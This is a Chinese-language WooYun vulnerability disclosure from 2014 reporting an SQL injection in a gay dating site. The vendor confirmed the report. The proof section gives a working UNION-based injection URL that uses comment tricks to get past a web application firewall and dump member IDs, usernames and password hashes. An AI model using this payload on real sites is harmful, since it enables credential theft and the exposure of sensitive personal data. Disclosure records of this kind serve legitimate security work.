当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-069745

漏洞标题:全球最大同性交友网全站用户数据告急(过狗直捣后台)

相关厂商:5dgay.com

漏洞作者: 浩天

提交时间:2014-07-28 19:41

修复时间:2014-09-11 19:42

公开时间:2014-09-11 19:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-28: 细节已通知厂商并且等待厂商处理中
2014-07-28: 厂商已经确认,细节仅向厂商公开
2014-08-07: 细节向核心白帽子及相关领域专家公开
2014-08-17: 细节向普通白帽子公开
2014-08-27: 细节向实习白帽子公开
2014-09-11: 细节向公众公开

简要描述:

这是一个特殊的群体,用户数据的隐私性更强。
号称全球最大的同性交友网站!!!!
这不应该是一个案例,更像是基础教学!!

详细说明:

0.jpg


存在sql注入,有狗,工具不咋好使,手工吧,不然封你ip

a.jpg


b.jpg


c.jpg


d.jpg

漏洞证明:

e.jpg


f.jpg


g.jpg


h.jpg


i.jpg


j.jpg


k.jpg


l.jpg


证明地址:
http://www.5dgay.com/jsjb.php?id=34/**/LIMIT/**/1,1/**/UNION/**/ALL/**/SELECT/**/1,2,CONCAT%28UID,0x3A,USERNAME,0x3A,PASSWORD%29,4/**/FROM/**/5DGAY99.WANEJY_MEMBER/**/WHERE/**/UID=1#
md5你自己解吧

修复方案:

图有点多,进后台,就没再继续了,应该可以shell
其他涉及支付接口、个人隐私未动,未脱裤
虽然你远在大洋彼岸,但大多用的都是中国人吖
这个群体的隐私比普通人更重要

版权声明:转载请注明来源 浩天@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-07-28 19:53

厂商回复:

万分感谢

最新状态:

暂无